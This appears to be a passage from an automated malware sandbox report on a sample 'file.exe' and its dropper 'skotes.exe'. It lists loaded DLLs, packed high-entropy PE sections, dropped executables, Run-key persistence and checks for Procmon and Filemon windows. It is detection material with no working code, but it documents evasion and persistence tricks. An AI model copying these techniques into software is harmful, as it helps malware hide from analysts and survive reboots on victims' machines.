                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: napinsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: pnrpnsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: wshbth.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: nlaapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeSection loaded: winrnr.dll
                          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                          Source: Window RecorderWindow detected: More than 3 window changes detected
                          Source: file.exeStatic file information: File size 3279872 > 1048576
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                          Source: file.exeStatic PE information: Raw size of cmuiqwlw is bigger than: 0x100000 < 0x2b4e00

                          Data Obfuscation

                          barindex
                          Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.f40000.0.unpack :EW;.rsrc:W;.idata :W;cmuiqwlw:EW;afwwhgey:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cmuiqwlw:EW;afwwhgey:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.bd0000.0.unpack :EW;.rsrc:W;.idata :W;cmuiqwlw:EW;afwwhgey:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cmuiqwlw:EW;afwwhgey:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 3.2.skotes.exe.bd0000.0.unpack :EW;.rsrc:W;.idata :W;cmuiqwlw:EW;afwwhgey:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cmuiqwlw:EW;afwwhgey:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 6.2.skotes.exe.bd0000.0.unpack :EW;.rsrc:W;.idata :W;cmuiqwlw:EW;afwwhgey:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;cmuiqwlw:EW;afwwhgey:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeUnpacked PE file: 12.2.f30149f036.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;klrfnhju:EW;auusyycz:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeUnpacked PE file: 14.2.f570600774.exe.a80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jkfvjajp:EW;yofpcxnn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jkfvjajp:EW;yofpcxnn:EW;.taggant:EW;
                          Source: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeUnpacked PE file: 30.2.f570600774.exe.a80000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jkfvjajp:EW;yofpcxnn:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jkfvjajp:EW;yofpcxnn:EW;.taggant:EW;
                          Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                          Source: random[2].exe0.6.drStatic PE information: real checksum: 0x2b7847 should be: 0x2b1ae4
                          Source: random[1].exe1.6.drStatic PE information: real checksum: 0x1c7b9b should be: 0x1ca114
                          Source: random[1].exe2.6.drStatic PE information: real checksum: 0x1c71df should be: 0x1cf3a9
                          Source: 536e42fc8b.exe.6.drStatic PE information: real checksum: 0x2b7847 should be: 0x2b1ae4
                          Source: f570600774.exe.6.drStatic PE information: real checksum: 0x1c71df should be: 0x1cf3a9
                          Source: f30149f036.exe.6.drStatic PE information: real checksum: 0x1ec068 should be: 0x1e7575
                          Source: file.exeStatic PE information: real checksum: 0x3297fd should be: 0x320c9d
                          Source: skotes.exe.0.drStatic PE information: real checksum: 0x3297fd should be: 0x320c9d
                          Source: 176986cc9c.exe.6.drStatic PE information: real checksum: 0x1c7b9b should be: 0x1ca114
                          Source: random[1].exe0.6.drStatic PE information: real checksum: 0x1ec068 should be: 0x1e7575
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: file.exeStatic PE information: section name: cmuiqwlw
                          Source: file.exeStatic PE information: section name: afwwhgey
                          Source: file.exeStatic PE information: section name: .taggant
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name: cmuiqwlw
                          Source: skotes.exe.0.drStatic PE information: section name: afwwhgey
                          Source: skotes.exe.0.drStatic PE information: section name: .taggant
                          Source: random[1].exe0.6.drStatic PE information: section name:
                          Source: random[1].exe0.6.drStatic PE information: section name: .idata
                          Source: random[1].exe0.6.drStatic PE information: section name:
                          Source: random[1].exe0.6.drStatic PE information: section name: klrfnhju
                          Source: random[1].exe0.6.drStatic PE information: section name: auusyycz
                          Source: random[1].exe0.6.drStatic PE information: section name: .taggant
                          Source: f30149f036.exe.6.drStatic PE information: section name:
                          Source: f30149f036.exe.6.drStatic PE information: section name: .idata
                          Source: f30149f036.exe.6.drStatic PE information: section name:
                          Source: f30149f036.exe.6.drStatic PE information: section name: klrfnhju
                          Source: f30149f036.exe.6.drStatic PE information: section name: auusyycz
                          Source: f30149f036.exe.6.drStatic PE information: section name: .taggant
                          Source: random[1].exe1.6.drStatic PE information: section name:
                          Source: random[1].exe1.6.drStatic PE information: section name: .idata
                          Source: random[1].exe1.6.drStatic PE information: section name:
                          Source: random[1].exe1.6.drStatic PE information: section name: hkjfghfg
                          Source: random[1].exe1.6.drStatic PE information: section name: gtwwivgb
                          Source: random[1].exe1.6.drStatic PE information: section name: .taggant
                          Source: 176986cc9c.exe.6.drStatic PE information: section name:
                          Source: 176986cc9c.exe.6.drStatic PE information: section name: .idata
                          Source: 176986cc9c.exe.6.drStatic PE information: section name:
                          Source: 176986cc9c.exe.6.drStatic PE information: section name: hkjfghfg
                          Source: 176986cc9c.exe.6.drStatic PE information: section name: gtwwivgb
                          Source: 176986cc9c.exe.6.drStatic PE information: section name: .taggant
                          Source: random[1].exe2.6.drStatic PE information: section name:
                          Source: random[1].exe2.6.drStatic PE information: section name: .idata
                          Source: random[1].exe2.6.drStatic PE information: section name:
                          Source: random[1].exe2.6.drStatic PE information: section name: jkfvjajp
                          Source: random[1].exe2.6.drStatic PE information: section name: yofpcxnn
                          Source: random[1].exe2.6.drStatic PE information: section name: .taggant
                          Source: f570600774.exe.6.drStatic PE information: section name:
                          Source: f570600774.exe.6.drStatic PE information: section name: .idata
                          Source: f570600774.exe.6.drStatic PE information: section name:
                          Source: f570600774.exe.6.drStatic PE information: section name: jkfvjajp
                          Source: f570600774.exe.6.drStatic PE information: section name: yofpcxnn
                          Source: f570600774.exe.6.drStatic PE information: section name: .taggant
                          Source: random[2].exe0.6.drStatic PE information: section name:
                          Source: random[2].exe0.6.drStatic PE information: section name: .idata
                          Source: random[2].exe0.6.drStatic PE information: section name: ixnajgom
                          Source: random[2].exe0.6.drStatic PE information: section name: seyuqqyf
                          Source: random[2].exe0.6.drStatic PE information: section name: .taggant
                          Source: 536e42fc8b.exe.6.drStatic PE information: section name:
                          Source: 536e42fc8b.exe.6.drStatic PE information: section name: .idata
                          Source: 536e42fc8b.exe.6.drStatic PE information: section name: ixnajgom
                          Source: 536e42fc8b.exe.6.drStatic PE information: section name: seyuqqyf
                          Source: 536e42fc8b.exe.6.drStatic PE information: section name: .taggant
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01058101 push edx; mov dword ptr [esp], 3C7FA057h0_2_01058241
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01058101 push edx; mov dword ptr [esp], ebx0_2_010582A3
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01058101 push 6F019901h; mov dword ptr [esp], eax0_2_010582BD
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01058101 push 77CD12F3h; mov dword ptr [esp], esp0_2_01058324
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01058101 push edi; mov dword ptr [esp], ebp0_2_01058357
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01058101 push 592DEB81h; mov dword ptr [esp], eax0_2_01058397
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01058101 push ecx; mov dword ptr [esp], 5617CF5Ch0_2_01058467
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F5D91C push ecx; ret 0_2_00F5D92F
                          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F51359 push es; ret 0_2_00F5135A
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00BED91C push ecx; ret 2_2_00BED92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00BED91C push ecx; ret 3_2_00BED92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C151E8 pushad ; ret 6_2_00C151F2
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C15297 pushad ; ret 6_2_00C1529B
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C152B5 pushad ; ret 6_2_00C152BE
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C154D5 pushad ; ret 6_2_00C154D9
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C15455 pushad ; ret 6_2_00C15459
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C1545C pushad ; ret 6_2_00C15466
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C15471 pushad ; ret 6_2_00C15475
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C155C6 pushad ; ret 6_2_00C155CA
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C155D9 pushad ; ret 6_2_00C155DD
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C15532 pushad ; ret 6_2_00C1553C
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C1563A pushad ; ret 6_2_00C1563E
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BED91C push ecx; ret 6_2_00BED92F
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00C0992F pushad ; ret 6_2_00C09931
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00BEDFC6 push ecx; ret 6_2_00BEDFD9
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 8_2_0022DB9A push ecx; ret 8_2_0022DBAD
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 10_2_0022DB9A push ecx; ret 10_2_0022DBAD
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00446061 push edx; retf 11_2_00446062
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_0043CA60 push eax; mov dword ptr [esp], 11102FFEh11_2_0043CA63
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00445A2E push esi; ret 11_2_00445A31
                          Source: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeCode function: 11_2_00442543 push esp; retf 11_2_00442549
                          Source: file.exeStatic PE information: section name: entropy: 7.053445284969334
                          Source: skotes.exe.0.drStatic PE information: section name: entropy: 7.053445284969334
                          Source: random[1].exe0.6.drStatic PE information: section name: klrfnhju entropy: 7.94158699808871
                          Source: f30149f036.exe.6.drStatic PE information: section name: klrfnhju entropy: 7.94158699808871
                          Source: random[1].exe1.6.drStatic PE information: section name: entropy: 7.974526844691932
                          Source: random[1].exe1.6.drStatic PE information: section name: hkjfghfg entropy: 7.952823803062777
                          Source: 176986cc9c.exe.6.drStatic PE information: section name: entropy: 7.974526844691932
                          Source: 176986cc9c.exe.6.drStatic PE information: section name: hkjfghfg entropy: 7.952823803062777
                          Source: random[1].exe2.6.drStatic PE information: section name: jkfvjajp entropy: 7.954470397724028
                          Source: f570600774.exe.6.drStatic PE information: section name: jkfvjajp entropy: 7.954470397724028
                          Source: random[2].exe0.6.drStatic PE information: section name: entropy: 7.7971598601852055
                          Source: 536e42fc8b.exe.6.drStatic PE information: section name: entropy: 7.7971598601852055
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1013512001\f570600774.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1013513001\3981530833.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1013510001\f30149f036.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[2].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1013509001\d0d9725343.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1013514001\536e42fc8b.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Temp\1013511001\176986cc9c.exeJump to dropped file

                          Boot Survival

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run f570600774.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 536e42fc8b.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 176986cc9c.exeJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 3981530833.exeJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: RegmonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow searched: window name: FilemonClassJump to behavior
